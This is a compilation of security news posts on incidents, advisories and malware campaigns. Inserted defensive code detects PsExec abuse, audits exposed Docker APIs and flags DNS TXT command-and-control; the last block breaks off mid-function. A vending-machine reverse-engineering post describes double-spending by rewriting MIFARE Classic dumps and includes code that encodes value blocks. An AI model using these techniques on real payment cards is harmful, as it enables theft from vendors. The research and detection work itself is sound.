“In a worst-case scenario, attackers could have breached the IT network as a means to hop onto the airport’s OT network in order to compromise critical operational systems ranging from runway lights to baggage handling machines and the air-train, to name a few of the many standard airport OT systems that could be cyber-sabotaged to cause catastrophic physical damage,”
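Detection logic for the execution chain described above, as an added example that is not Cyberbit’s code: it runs three rules over process-creation and registry-set events (PAExec or PsExec invoked with the run-as-SYSTEM switch, a SYSTEM child of the remote-exec service started from a user-writable path, and a Run-key value pointing at PAExec). The events are constructed in a Sysmon-like shape; the Run key as the persistence location, the player.exe path and the PAExec service-name prefix are assumptions about details the report leaves out.

```python
"""Flag the execution pattern Cyberbit describes: PAExec launching an executable
as SYSTEM, and a registry entry that keeps PAExec around.

Added example, not Cyberbit's code. Events are constructed in a Sysmon-like
shape. Assumptions: '-s' is the PsExec-style run-as-SYSTEM switch, PAExec's
service-side process name starts with 'paexec', persistence sits in a Run key,
and player.exe's path is invented for the sample.
"""
import ntpath
import re

REMOTE_EXEC_TOOLS = {"paexec.exe", "psexec.exe", "psexec64.exe"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def image_name(path):
    """Lower-case basename of a Windows path."""
    return ntpath.basename(path).lower()


def has_system_switch(cmdline):
    """True when the command line carries a stand-alone '-s' or '/s' switch."""
    return re.search(r"(?:^|\s)[-/]s(?:\s|$)", cmdline, re.IGNORECASE) is not None


def analyze_events(events):
    """Return (rule, detail) for every event matching one of the three indicators."""
    alerts = []
    for ev in events:
        if ev["type"] == "process_create":
            img = image_name(ev["image"])
            parent = image_name(ev["parent_image"])
            cmd = ev["command_line"]
            if img in REMOTE_EXEC_TOOLS and has_system_switch(cmd):
                alerts.append(("remote-exec-as-system", f"{img} with -s: {cmd}"))
            # SYSTEM child of the remote-exec service, started from outside trusted dirs.
            if (parent.startswith("paexec") or parent.startswith("psexesvc")) \
                    and ev["user"].lower() == "nt authority\\system" \
                    and not ev["image"].lower().startswith(TRUSTED_DIRS):
                alerts.append(("system-proc-from-untrusted-path",
                               f"{ev['image']} spawned by {parent}"))
        elif ev["type"] == "registry_set":
            if "\\currentversion\\run" in ev["key"].lower() and "paexec" in ev["data"].lower():
                alerts.append(("run-key-persistence", f"{ev['key']} = {ev['data']}"))
    return alerts


# Constructed events: the first three reproduce the reported chain, the last two are benign.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": "C:\\Tools\\PAExec.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "PAExec.exe -s \\\\WS-07 C:\\ProgramData\\player\\player.exe", "user": "CORP\\operator"},
    {"type": "process_create", "image": "C:\\ProgramData\\player\\player.exe",
     "parent_image": "C:\\Windows\\PAExec-1234-WS-01.exe", "command_line": "player.exe",
     "user": "NT AUTHORITY\\SYSTEM"},
    {"type": "registry_set", "key": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\updater",
     "data": "C:\\Tools\\PAExec.exe -s C:\\ProgramData\\player\\player.exe"},
    {"type": "process_create", "image": "C:\\Windows\\System32\\svchost.exe",
     "parent_image": "C:\\Windows\\System32\\services.exe", "command_line": "svchost.exe -k netsvcs",
     "user": "NT AUTHORITY\\SYSTEM"},
    {"type": "process_create", "image": "C:\\Windows\\System32\\notepad.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "command_line": "notepad.exe notes.txt",
     "user": "CORP\\operator"},
]

if __name__ == "__main__":
    for rule, detail in analyze_events(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```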

Pierluigi Paganini

(SecurityAffairs – European airport workstations, miner)

The post Cryptocurrency miners infected more than 50% of the European airport workstations appeared first on Security Affairs.

Critical and high-severity flaws addressed in Cisco Aironet APs

A critical flaw in Aironet access points (APs) can be exploited by a remote attacker to gain unauthorized access to vulnerable devices.

Cisco disclosed a critical vulnerability in Aironet access points (APs), tracked as CVE-2019-15260, that can be exploited by a remote, unauthenticated attacker to gain unauthorized access to vulnerable devices with elevated privileges. This vulnerability was discovered during the resolution of a Cisco TAC support case.

Cisco has already released software updates that address the flaw; the company pointed out that there are no workarounds for this vulnerability.

The flaw is caused by insufficient access control for some URLs; an attacker could exploit it by simply requesting the unprotected URLs.

“The vulnerability is due to insufficient access control for certain URLs on an affected device. An attacker could exploit this vulnerability by requesting specific URLs from an affected AP. An exploit could allow the attacker to gain access to the device with elevated privileges.” reads the security advisory published by Cisco.

The vulnerability affects Aironet 1540, 1560, 1800, 2800, 3800 and 4800 series APs. Cisco released versions 8.5.151.0, 8.8.125.0 and 8.9.111.0 to address the vulnerability.

Cisco revealed that there is no evidence of attacks exploiting the flaw in the wild.

Aironet APs are also affected by two high-severity flaws that can be exploited by an unauthenticated attacker to trigger a denial-of-service (DoS) condition.

The first flaw, tracked as CVE-2019-15261, impacts the Point-to-Point Tunneling Protocol (PPTP) VPN packet processing functionality.

“A vulnerability in the Point-to-Point Tunneling Protocol (PPTP) VPN packet processing functionality in Cisco Aironet Access Points (APs) could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition.” states the Cisco advisory. “The vulnerability is due to insufficient validation of Generic Routing Encapsulation (GRE) frames that pass through the data plane of an affected AP. An attacker could exploit this vulnerability by associating to a vulnerable AP, initiating a PPTP VPN connection to an arbitrary PPTP VPN server, and sending a malicious GRE frame through the data plane of the AP. A successful exploit could allow the attacker to cause an internal process of the targeted AP to crash, which in turn would cause the AP to reload. The AP reload would cause a DoS condition for clients that are associated with the AP.”

The second flaw, tracked as CVE-2019-15264, resides in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation.

“A vulnerability in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation of Cisco Aironet and Catalyst 9100 Access Points (APs) could allow an unauthenticated, adjacent attacker to cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition.” reads the security advisory published by Cisco.

“The vulnerability is due to improper resource management during CAPWAP message processing. An attacker could exploit this vulnerability by sending a high volume of legitimate wireless management frames within a short time to an affected device. A successful exploit could allow the attacker to cause a device to restart unexpectedly, resulting in a DoS condition for clients associated with the AP.”

Pierluigi Paganini

(SecurityAffairs – Cisco Aironet APs, zero-day)

The post Critical and high-severity flaws addressed in Cisco Aironet APs appeared first on Security Affairs.

International operation dismantled largest Dark Web Child abuse site

The United States Department of Justice announced the arrest of hundreds of criminals as part of a global operation against a dark web child abuse community.

The US Department of Justice announced the arrest of hundreds of criminals as part of a global operation conducted against the crime community operating the largest dark web child porn site, ‘Welcome to Video’.

The operation involved law enforcement agencies from several countries, including the IRS-CI, the US Homeland Security Investigations, the NCA, the Korean National Police of the Republic of Korea, and the German Federal Criminal Police (the Bundeskriminalamt).

Officials have arrested the administrator of the site, Jong Woo Son of South Korea (23), along with 337 suspects in 38 countries who have been charged for allegedly being users of the site.

Two former federal law enforcement officials were allegedly involved in the child porn site, Paul Casey Whipple and Richard Nikolai Gratkowski.

The US authorities issued a warrant for Son’s arrest in February 2018, and South Korean police arrested the man on March 5, 2018, and seized the server used to operate Welcome To Video.

According to the indictment, the ‘Welcome to Video’ child abuse site was launched in June 2015 and operated until March 2018. The site received at least 420 BTC in three years through at least 7300 transactions.

Experts from the National Center for Missing and Exploited Children (NCMEC) are currently analyzing over 250,000 unique videos hosted on the website, 45 percent of them contain new images that have not been previously known to exist.

“According to the indictment, on March 5, 2018, agents from the IRS-CI, HSI, National Crime Agency in the United Kingdom, and Korean National Police in South Korea arrested Son and seized the server that he used to operate a Darknet market that exclusively advertised child sexual exploitation videos available for download by members of the site.” reads a press release published by the DoJ.  “The operation resulted in the seizure of approximately eight terabytes of child sexual exploitation videos, which is one of the largest seizures of its kind.”

The great news is that the operation allowed investigators to rescue tens of children living in the United States, Spain, and the United Kingdom.

According to the indictment, law enforcement experts discovered that the child abuse website was hosted on the IP addresses 121.185.153.64 and 121.185.153.45, which were assigned by a provider in South Korea and registered to an account serviced at the defendant’s home.

Experts also identified more than one million unique bitcoin addresses that were used to receive payments from the users of the website. Two users of the Darknet market committed suicide subsequent to the execution of search warrants.

“Welcome To Video offered these videos for sale using the cryptocurrency bitcoin.  Typically, sites of this kind give users a forum to trade in these depictions.  This Darknet website is among the first of its kind to monetize child exploitation videos using bitcoin.  In fact, the site itself boasted over one million downloads of child exploitation videos by users.  Each user received a unique bitcoin address when the user created an account on the website.” continues the press release. “An analysis of the server revealed that the website had more than one million bitcoin addresses, signifying that the website had capacity for at least one million users.”

Though Son is currently serving an 18-month sentence in South Korea, a federal grand jury in Washington DC unsealed a 9-count indictment against him just yesterday, with the U.S. authorities seeking his extradition to face justice.

“Darknet sites that profit from the sexual exploitation of children are among the most vile and reprehensible forms of criminal behavior,” said Assistant Attorney General Brian A. Benczkowski of the Justice Department’s Criminal Division. “This Administration will not allow child predators to use lawless online spaces as a shield. Today’s announcement demonstrates that the Department of Justice remains firmly committed to working closely with our partners in South Korea and around the world to rescue child victims and bring to justice the perpetrators of these abhorrent crimes.”

Pierluigi Paganini

(SecurityAffairs – Child abuse, cybercrime)

The post International operation dismantled largest Dark Web Child abuse site appeared first on Security Affairs.

Graboid the first-ever Cryptojacking worm that targets Docker Hub

Security experts at Palo Alto Networks discovered a worm dubbed Graboid that spreads using Docker containers.

Palo Alto Networks researchers discovered a new Monero miner with wormable capabilities, dubbed Graboid, that spreads using Docker containers.

Experts discovered that, to target new systems, the Graboid worm periodically queries the C&C for a list of vulnerable hosts; in this way the malicious code is told which target to infect next.

“Unit 42 researchers identified a new cryptojacking worm we’ve named Graboid that’s spread to more than 2,000 unsecured Docker hosts. We derived the name by paying homage to the 1990’s movie “Tremors,” since this worm behaves similarly to the sandworms in the movie, in that it moves in short bursts of speed, but overall is relatively inept.” reads the analysis published by the experts.

Graboid is the first-ever cryptojacking worm found in images on Docker Hub. The analysis conducted by the experts shows that, on average, each miner is active 63% of the time, with each mining period lasting 250 seconds.

Palo Alto Networks found over 2,000 unsecured Docker engines exposed online, which means that threat actors could take full control of them and abuse their resources for malicious purposes.

The hackers first compromise an unsecured Docker daemon, then run a malicious container pulled from Docker Hub; the container fetches scripts and a list of vulnerable hosts from the C&C and spreads by targeting the hosts in that list.

‘Graboid’ implements both worm-spreading and cryptojacking capabilities inside containers. The experts noticed that the malware randomly selects three targets at each iteration. It installs the worm on the first target, stops the miner on the second target, and starts the miner on the third target, leading to a very random mining behavior.

“Essentially, the miner on every infected host is randomly controlled by all other infected hosts. The motivation for this randomized design is unclear. It can be a bad design, an evasion technique (not very effective), a self-sustaining system or some other purposes.” continues the analysis.

Experts reported that the malicious Docker image (pocosow/centos) has been downloaded more than 10,000 times from Docker Hub, while the gakeaws/nginx image has been downloaded over 6,500 times.

“While this cryptojacking worm doesn’t involve sophisticated tactics, techniques, or procedures, the worm can periodically pull new scripts from the C2s, so it can easily repurpose itself to ransomware or any malware to fully compromise the hosts down the line and shouldn’t be ignored.” concludes the analysis. “If a more potent worm is ever created to take a similar infiltration approach, it could cause much greater damage, so it’s imperative for organizations to safeguard their Docker hosts.”
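The exposure Graboid abuses is a Docker API reachable over TCP with no client authentication. The following added example (not code from Unit 42 or from the article) audits a host's daemon.json and its running containers for that exposure and for the two image repositories named above; `hosts`, `tls` and `tlsverify` are real daemon.json options, while the sample configuration, container names and image tag are constructed.

```python
"""Audit a Docker host for the exposure Graboid abused: a Docker API reachable
over TCP without client authentication, and running containers started from the
image repositories named in the Unit 42 analysis.

Added example. 'hosts', 'tls' and 'tlsverify' are real daemon.json options; the
sample configuration, container names and image tag below are constructed."""
import json
from urllib.parse import urlparse

# Image repositories named in the analysis; tags vary, so match on repository only.
KNOWN_BAD_REPOS = {"pocosow/centos", "gakeaws/nginx"}


def audit_daemon_config(config_text: str) -> list:
    """Return findings for a daemon.json text.

    A tcp:// listener without 'tlsverify' accepts commands from anyone who can
    reach the port, which is exactly the 'unsecured Docker host' the worm scans
    for. 'tls': true alone only encrypts; it does not authenticate the client."""
    cfg = json.loads(config_text or "{}")
    tls_verify = bool(cfg.get("tlsverify", False))
    findings = []
    for host in cfg.get("hosts", []):
        url = urlparse(host)
        if url.scheme != "tcp":
            continue  # unix:// and fd:// sockets are local to the host
        if not tls_verify:
            findings.append(f"unauthenticated Docker API on {host}")
        elif url.hostname in (None, "", "0.0.0.0", "::"):
            findings.append(f"TLS-protected API bound to all interfaces: {host}")
    return findings


def repo_of(image_ref: str) -> str:
    """Strip tag and digest: 'pocosow/centos:7.6.1810' -> 'pocosow/centos'.

    A ':' after the last '/' is a tag; a ':' before it belongs to a registry port."""
    name = image_ref.split("@", 1)[0]
    head, sep, tail = name.rpartition("/")
    tail = tail.split(":", 1)[0]
    return f"{head}/{tail}" if sep else tail


def flag_known_images(containers: list) -> list:
    """containers: dicts as printed by `docker ps --format '{{json .}}'`;
    only the 'Image' and 'Names' fields are used."""
    return [c["Names"] for c in containers if repo_of(c["Image"]) in KNOWN_BAD_REPOS]


# Constructed sample input: an API exposed on all interfaces with TLS off, and
# one container running from a repository named in the analysis.
SAMPLE_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
    "tls": False,
})
SAMPLE_CONTAINERS = [
    {"Image": "pocosow/centos:7.6.1810", "Names": "jolly_miner"},
    {"Image": "nginx:1.17", "Names": "web"},
]


def audit(config_text: str = SAMPLE_DAEMON_JSON, containers: list = SAMPLE_CONTAINERS) -> dict:
    """Combine both checks into one report."""
    return {"daemon": audit_daemon_config(config_text),
            "containers": flag_known_images(containers)}


if __name__ == "__main__":
    for section, items in audit().items():
        print(f"{section}: {items if items else 'no findings'}")
```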

Pierluigi Paganini

(SecurityAffairs – Graboid, hacking)

The post Graboid the first-ever Cryptojacking worm that targets Docker Hub appeared first on Security Affairs.

M6 Group, largest France private multimedia group, hit by ransomware attack

M6, one of France’s biggest TV channels, hit by ransomware

Unlike The Weather Channel earlier this year, M6 remained on the air.

The M6 Group, France’s largest private multimedia group, was the victim of a ransomware attack over the weekend.

The systems of the M6 Group, France’s largest private multimedia group, were infected with ransomware over the weekend; fortunately, none of the company’s TV and radio channels had their broadcasts interrupted.

According to the French newspaper L’Express, the ransomware attack only impacted landlines and e-mail.

“The company’s phone lines and e-mail are unusable, so employees have to use their mobile phones and text messages to communicate,” an internal source told the newspaper. “all the office and management tools are in disruption.” 

The company revealed the incident took place on Saturday.

The cybersecurity staff at the M6 Group was able to immediately mitigate the threat, preventing any downtime for its TV channels, radio stations, and film studios.

“The M6 Group was the target of a malicious computer attack on Saturday morning, and the quick and efficient intervention of our cyber security experts has helped to ensure the continued good broadcasting of the programs on all our TV and radio antennas.” reads the message posted through the Twitter account of the group.

In April, another broadcaster suffered a similar incident: a cyber attack hit the Weather Channel and forced it off the air for at least 90 minutes.

In April 2015, TV5Monde was hit by a severe cyber attack that disrupted broadcasting across its channels. The attackers also hijacked the TV5Monde website and the social media accounts of the French broadcaster.

Yves Bigot, at the time the director-general of TV5Monde, told the BBC that the cyber attack came close to destroying the network of the French broadcaster, and the investigation pointed to the Russia-linked APT28 group.

Pierluigi Paganini

(SecurityAffairs – M6 Group, ransomware)

The post M6 Group, largest France private multimedia group, hit by ransomware attack appeared first on Security Affairs.

Signature update for Symantec Endpoint Protection crashed many devices

Symantec rolled out an intrusion prevention signature update for its Endpoint Protection product that has caused many devices to crash and display a so-called blue screen of death (BSOD).

The intrusion prevention signature update for the Endpoint Protection product had a severe impact on devices: in many cases it caused them to crash and display the blue screen of death (BSOD).

Several users reported problems through the company’s support forums and other sites online.

Customers complained about problems with Windows 7, 8 and 10.

Symantec has acknowledged the problem with the update to its Endpoint Protection Client explaining that it causes a Windows kernel exception.

The company released the version 2019/10/14 r62 to address the issue caused by the 2019/10/14 r61 update.

“After running LiveUpdate on Symantec Endpoint Protection (SEP), the computer crashes indicating IDSvix86.sys/IDSvia64.sys as the cause of the exception.” reads the advisory published by Symantec.

Symantec recommends downloading the new signature version for Endpoint Protection or rolling back to an earlier stable version.

“Please run LiveUpdate to download latest Intrusion Prevention signature 2019/10/14 r62, or rollback to an earlier known good content revision to prevent the BSOD situation. Please check How to Backdate Virus Definitions in Endpoint Protection Manager for more details on how to roll back definitions.” continues Symantec.

Customers who cannot run LiveUpdate to apply the signatures on their systems can use the following workaround:

  1. Boot in Safe Mode and perform the following for x64 or x86 installations of SEP.
  2. Run sc config idsvia64 start= disabled (x64) or sc config idsviax86 start= disabled (x86) from cmd. Note that sc requires a space after the equals sign.
  3. Reboot in normal mode.
  4. Update the IPS definitions (IPSdefs).
  5. Run sc config idsvia64 start= system (x64) or sc config idsviax86 start= system (x86) from cmd.
  6. Reboot.

Pierluigi Paganini

(SecurityAffairs – Symantec, BSOD)

The post Signature update for Symantec Endpoint Protection crashed many devices appeared first on Security Affairs.

Approaching the Reverse Engineering of a RFID/NFC Vending Machine

Security expert Pasquale Fiorillo demonstrates how to hack an RFID/NFC vending machine.

The affected vendor did not respond to my responsible disclosure request, so I’m here to disclose this “hack” without revealing the name of the vendor.

The target vending machine uses an insecure NFC card, the MIFARE Classic 1K, which has been affected by multiple vulnerabilities and so should not be used in sensitive applications.
Furthermore, the user’s credit was stored on the card itself, enabling different attack scenarios, from double spending to potential data tampering that stores an arbitrary credit.

Useful notes from MIFARE Classic 1K datasheet:

EEPROM: 1 kB is organized in 16 sectors of 4 blocks. One block contains 16 bytes.
The last block of each sector is called “trailer”, which contains two secret keys and programmable access conditions for each block in this sector.

  • Manufacturer block: This is the first data block (block 0) of the first sector (sector 0). It contains the IC manufacturer data. This block is read-only.
  • Data blocks: All sectors contain 3 blocks of 16 bytes for storing data (Sector 0 contains only two data blocks and the read-only manufacturer block).
    The data blocks can be configured by the access conditions bits as:
    • Read/Write blocks: fully arbitrary data, in arbitrary format
    • Value blocks: fixed data format which permits native error detection and correction and a backup management.
      A value block can only be generated through a write operation in value block format:
      • Value: Signifies a signed 4-byte value. The lowest significant byte of a value is stored in the lowest address byte. Negative values are stored in standard 2’s complement format. For reasons of data integrity and security, a value is stored three times, twice non-inverted and once inverted.
      • Adr: Signifies a 1-byte address, which can be used to save the storage address of a block, when implementing a powerful backup management. The address byte is stored four times, twice inverted and non-inverted.
Value block example for value 0x0012D687

Let’s start hacking:

In this post I will not show you how to crack the MIFARE Classic keys needed to read/write the card, ’cause someone else has already disclosed it some time ago, so Google is your friend.
At last, please, use this post to skill yourself up in the fascinating world of reverse engineering, and not for stealing stuff.

In order to start the analysis I need some dumps to compare.
The requirements for this task are the nfc-mfclassic tool included in libnfc, an NFC hardware interface like the ACR122U, and a binary compare (aka binary diff) tool like dhex.

Dumps:

  • Dump 0: Virgin card (not included in the screenshot below ’cause all data bytes were 0x00, except for sector 0, which holds the UID and manufacturer information. This sector is read-only, so these bytes are the same across dumps)
  • Dump 1: Card charged with single 0.10€ coin (Note that vending machine displays the balance with 3 decimals, 0.100€)
  • Dump 2: 0.00€ after spending the entire balance with 4 transactions of 0.025€ each
  • Dump 3: 0.10€ recharged with one single coin
Dump 1 compared to Dump 2, yellow bytes differ
Dump 2 compared to Dump 3, yellow bytes differ

Blurred bytes are the MIFARE keys A and B, except for the 32 bytes at offset 0xE0, whose purpose I don’t know.
The 4 bytes between the keys are the Access Conditions and denote which key must be used for read and write operations (key A or key B) and the block type (“read/write block” or “value block”).

The tool mfdread is useful to decode the Access Condition bytes rapidly, and, in general, to display MIFARE Classic data divided by sectors and blocks:

Dump 1 with mfdread parser

Early analysis:

Note: from now on I will refer to the offsets with a [square parenthesis] and a value with no parenthesis.

  • Blocks 8, 9, 10, 12 and 13 can be used also as “value block”
  • Except for bytes between offsets [0x80] and [0x9F], only few bytes differ between dumps
  • Some data are redundant, for example [0x60 … 0x63] has the same values of [0xA0 … 0xA3]
  • Values at [0xC0], [0xD0], [0xC8], [0xD8] differ by 4 between 1st and 2nd dump (eg: 0xFE – 0xFA = 0x4) and differ by 1 between 2nd dump and 3rd dump (eg: 0xFA – 0xF9 = 0x1)
  • Values at [0xC4], [0xD4] differ by 4 between 1st and 2nd dump (eg: 0x05 – 0x01 = 0x4) and differ by 1 between 2nd and 3rd dump (eg: 0x06 – 0x05 = 0x1)
    • 4 is the number of spending transactions made the first time, and 1 is the number of recharge transactions made the second time
  • Sum between yellow squared and red squared offsets has 0xFF value. In other words red squared is inverse (XOR with 0xFF) of yellow squared. For example:
    • 0xFE ⊕ 0xFF = 0x01
    • 0xFF ⊕ 0xFF = 0x00
    • 0x7F ⊕ 0xFF = 0x80
  • Values at [0x60 … 0x63] are a UNIX TIMESTAMP in little endian notation:
    • Dump 1: 0x4F9E2C27 -> 0x272C9E4F = 657235535 = 10/29/1990 @ 9:25pm
    • Dump 2: 0x71B62C27 -> 0x272CB671 = 657241713 = 10/29/1990 @ 11:08pm
    • Dump 3: 0x18592D27 -> 0x272D5918 = 657283352 = 10/30/1990 @ 10:42am
      • Ok, we are not in the ’90s, but the time difference between transactions is correct, maybe the vending machine doesn’t have a UPS 🙂

Early findings:

  • The timestamp of the last transaction is stored as a 32-bit integer at MIFARE block 6 and redundantly at MIFARE block 10
  • Only MIFARE blocks 12 and 13 have the “Value block” format, and they are used to store the counter of remaining transactions as a 32-bit value.
    This counter starts from 0x7FFFFFFF (2,147,483,647) and is decremented at each transaction
  • Blocks 1, 4, and 14 contain some data that is fixed between dumps
  • Blocks 8 and 9 change entirely at each transaction
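
The value block layout from the datasheet notes and the little-endian timestamp decoding from the early analysis, as an added example written for this post (not the author's own tooling): the byte layout follows the NXP datasheet (value, ~value, value, adr, ~adr, adr, ~adr), the sample values are the ones quoted above (0x0012D687, 0x7FFFFFFF, 0x00000CE4 and the three dump timestamps), and the adr byte 0x01 is a constructed choice. Nothing here touches a physical card.

```python
"""MIFARE Classic 1K 'value block' encoding/decoding plus the little-endian
timestamp decoding used in the dump analysis.

Added example. Byte layout per the NXP datasheet: value, ~value, value, then
adr, ~adr, adr, ~adr. Sample values are the ones quoted in the post; the adr
byte used below (0x01) is a constructed choice."""
import struct
from datetime import datetime, timezone

BLOCK_SIZE = 16


def encode_value_block(value: int, adr: int = 0) -> bytes:
    """Build a 16-byte value block: signed 32-bit little-endian value stored
    three times (twice plain, once inverted) followed by adr, ~adr, adr, ~adr."""
    if not -2**31 <= value < 2**31:
        raise ValueError("value must fit a signed 32-bit integer")
    if not 0 <= adr <= 0xFF:
        raise ValueError("adr is a single byte")
    v = struct.pack("<i", value)
    inv_v = bytes(b ^ 0xFF for b in v)
    a, inv_a = bytes([adr]), bytes([adr ^ 0xFF])
    return v + inv_v + v + a + inv_a + a + inv_a


def decode_value_block(block: bytes) -> tuple:
    """Return (value, adr) after checking every redundant copy; the inverted
    copies are what the datasheet calls 'native error detection'."""
    if len(block) != BLOCK_SIZE:
        raise ValueError("a MIFARE Classic block is 16 bytes")
    v, inv_v, v2 = block[0:4], block[4:8], block[8:12]
    a, inv_a, a2, inv_a2 = block[12], block[13], block[14], block[15]
    if v != v2 or bytes(b ^ 0xFF for b in v) != inv_v:
        raise ValueError("corrupt value copies")
    if a != a2 or (a ^ 0xFF) != inv_a or inv_a != inv_a2:
        raise ValueError("corrupt adr copies")
    return struct.unpack("<i", v)[0], a


def is_value_block(block: bytes) -> bool:
    """True when the block is internally consistent with the value format
    (the way blocks 12 and 13 were recognised in the dumps)."""
    try:
        decode_value_block(block)
        return True
    except ValueError:
        return False


def decode_timestamp_le(raw: bytes) -> tuple:
    """4 little-endian bytes -> (unix seconds, 'MM/DD/YYYY @ H:MMam/pm' in UTC),
    e.g. the bytes 4F 9E 2C 27 found at offset [0x60] of dump 1."""
    ts = struct.unpack("<I", raw)[0]
    when = datetime.fromtimestamp(ts, tz=timezone.utc)
    clock = when.strftime("%I:%M%p").lstrip("0").lower()
    return ts, f"{when.month:02d}/{when.day:02d}/{when.year} @ {clock}"


def credit_from_value_block(block: bytes) -> str:
    """The 'easier card' case: the stored value is the balance in euro
    thousandths, shown with the three decimals the machine displays."""
    value, _ = decode_value_block(block)
    return f"{value / 1000:.3f}€"


if __name__ == "__main__":
    blk = encode_value_block(0x0012D687, adr=0x01)
    print(blk.hex(" "), decode_value_block(blk))
    print(encode_value_block(0x7FFFFFFF).hex(" "))  # FF FF FF 7F 00 00 00 80 ...
    for name, raw in (("Dump 1", "4f9e2c27"), ("Dump 2", "71b62c27"), ("Dump 3", "18592d27")):
        print(name, decode_timestamp_le(bytes.fromhex(raw)))
    print(credit_from_value_block(encode_value_block(0x00000CE4)))
```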

The credit:

If there is credit stored on the card, it is encoded in blocks 8 and 9, and the number of bytes that change between small credit differences (for example between 0.00€ and 0.10€) could indicate that some cryptographic function is involved.

At this time, a double spending attack could confirm if the credit is really stored on the card.
So, after spending all the credit, I have rewritten a previous dump on the card and I went to test it at the vending machine. The card was fully functional with the previous credit stored in that dump. Now, I’m certain that the credit is encoded (and probably encrypted) in the blocks 8 and 9.

Conclusion:

Even if the encoding format of the credit is still unknown, a double spending attack was possible.

This means that the vendor’s effort to obfuscate the credit is nullified 🙁

Adding a unique token to the card that is invalidated in the back-end after each transaction would mean that this token has to be shared between all the vending machines of the vendor; but if we add an internet connection to the vending machine, there is no longer any reason to store the credit on the card.

So, after all, the only remediation action that makes sense is: DO NOT STORE THE CREDIT ON THE CARD! And, more generally: DO NOT TRUST THE CLIENT!

Road to arbitrary credit:

Spending 1€ an infinite number of times isn’t the goal of this hack. The only real goal is FUN!
To continue this analysis I need to collect a large number of dumps to advance some hypothesis so, when I have other material I will make another post.

An example of easier card:

Some vendors take an even easier approach, using the MIFARE “Value block” to store the credit without obfuscation or encryption.

Credit stored on the MIFARE Value Block

The above screenshot made with “MIFARE Classic Tool” on Android smartphone, represents a Value Block used to store the credit:

0x00000CE4 = 3300 is the value in Euro thousandths (3.30€).

This particular vendor does not use key A, and key B is the default key 0xFFFFFFFFFFFFFFFF, so the attacker doesn’t need to crack anything.

Reverse engineering and cracking a vending machine is always fun.

The original post was published here

About the author: Pasquale Fiorillo

I’m a Security Auditor at ISGroup and an independent Security Researcher. As a Security Auditor, my job is to perform security activities like penetration tests and vulnerability assessments on networks and web applications in order to identify security issues that may be exploited by an attacker to perform malicious actions on your assets.

When I was a teenager I co-founded an underground e-zine called Italian Hard Phreaking with some friends on IRC, writing lots of papers related to hacking and reverse engineering in the telecommunication world. Later, I started a new adventure as a Security Researcher, discovering vulnerabilities in commonly used software, web applications, and web sites, in collaboration with the other fabulous people of U.S.H.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post Approaching the Reverse Engineering of a RFID/NFC Vending Machine appeared first on Security Affairs.

Chinese-speaking cybercrime gang Rocke changes tactics

The Chinese-speaking cybercrime gang Rocke, which carried out several large-scale cryptomining campaigns, is now using new tactics to evade detection.

The Chinese-speaking cybercrime gang Rocke, which carried out several large-scale cryptomining campaigns in the past, has been observed using new tactics, techniques, and procedures (TTPs), along with updated malware, to evade detection.

The cybercrime organization was first spotted in April 2018 by researchers at Cisco Talos. In early 2019, researchers from Palo Alto Networks Unit 42 found new malware samples used by the Rocke group for cryptojacking that uninstall cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud from Linux servers.

In March, the group was using a dropper dubbed LSD that was controlled via Pastebin, but since this summer the threat actors have moved their Command and Control (C2) infrastructure to a self-hosted solution.

The malicious code is used by the hackers to deliver a Monero (XMR) cryptominer that is detected by almost no antivirus solution.

The Rocke group was also observed exploiting the CVE-2019-3396 flaw in Confluence servers to get remote code execution and deliver the miners.

“Rocke, a China-based cryptomining threat actor, has changed its Command and Control (C2) infrastructure away from Pastebin to a self-hosted solution during the summer of 2019.” reads the analysis published by the security firm Anomali. “the actor moved away from hosting the scripts on dedicated servers and instead started to use Domain Name System (DNS) text records. These records are accessed via normal DNS queries or DNS-over-HTTPs (DoH) if the DNS query fails. In addition to the C2 change, functionality was also added to their LSD malware to exploit ActiveMQ servers vulnerable to CVE-2016-3088.”

The use of self-hosted infrastructure and DNS records makes the group’s operations harder to detect and take down. The new LSD sample was first spotted on September 17, as reported in the following graph.

The group also improved its LSD dropper by adding the malicious code to exploit CVE-2016-3088 in ActiveMQ servers.

In order to ensure that only its miner is running on the infected machine, the group attempts to kill any other processes with high CPU usage. The LSD malware checks the MD5 hash of the files to avoid killing its own instance running on the system.

“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity,” concludes Anomali Labs.

“It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future.”

Technical details, including Indicators of Compromise, are reported in the analysis published by Anomali.
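A defender-side heuristic for the delivery channel described above, scripts fetched from DNS TXT records, as an added example that is not Anomali's or the article's code: hosts whose TXT answers are far larger than ordinary SPF/DMARC records, that poll the same TXT name repeatedly, or whose queries are mostly TXT are flagged. The log format, client addresses and the placeholder domain are constructed; none of them is a real Rocke indicator.

```python
"""Heuristic detection of script delivery over DNS TXT records, the C2 channel
the Rocke group moved to according to the analysis quoted above.

Added example, not code from Anomali or from the article. The log format and
every sample line are constructed; the domain is a placeholder, not an IoC."""
from collections import defaultdict

# Constructed log: "<unix-ts> <client-ip> <qname> <qtype> <rcode> <answer-bytes>"
SAMPLE_DNS_LOG = """\
1568700000 10.0.0.5 www.example.com A NOERROR 16
1568700002 10.0.0.5 c2-placeholder.example.invalid TXT NOERROR 1450
1568700061 10.0.0.5 c2-placeholder.example.invalid TXT NOERROR 1450
1568700120 10.0.0.5 c2-placeholder.example.invalid TXT SERVFAIL 0
1568700003 10.0.0.9 mail.example.com MX NOERROR 40
1568700004 10.0.0.9 _dmarc.example.com TXT NOERROR 96
1568700005 10.0.0.9 www.example.com A NOERROR 16
"""


def parse_dns_log(text: str) -> list:
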